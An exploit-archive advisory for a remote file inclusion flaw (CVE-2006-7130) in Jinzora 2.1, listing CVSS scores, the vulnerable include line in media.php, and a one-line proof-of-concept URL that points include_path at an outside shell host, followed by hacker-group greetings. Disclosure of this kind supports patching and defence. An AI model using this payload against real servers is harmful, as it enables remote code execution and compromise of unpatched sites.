Jinzora <= 2.1 Remote File Inclusion

2007-03-08 / 2007-03-09

Credit: k1tk4t

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-7130

CWE: CWE-94

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

########################################################################
##########
# Jinzora <= 2.1 Remote File Inclusion 
# Download Source : http://www.jinzora.com/downloads/j2.1.tar.gz
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   -- #newhack[dot]org 
########################################################################

file ;
media.php
########################################################################

bugs ; 
// include classes for extending.
	require_once($include_path. 'backend/classes.php');
########################################################################

exmple and methode exploit ;
http://localhost/jinzora2/backend/primitives/cache/media.php?include_pat
h=http://shell/cmd.do?
########################################################################

Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubicrew (all member solpotcrew community)
person;
y3dips, lirva32, the_day,(&all echo staff) 
illibero,NoGe(all member asiahacker),
nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Jinzora <= 2.1 Remote File Inclusion

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Jinzora <= 2.1 Remote File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.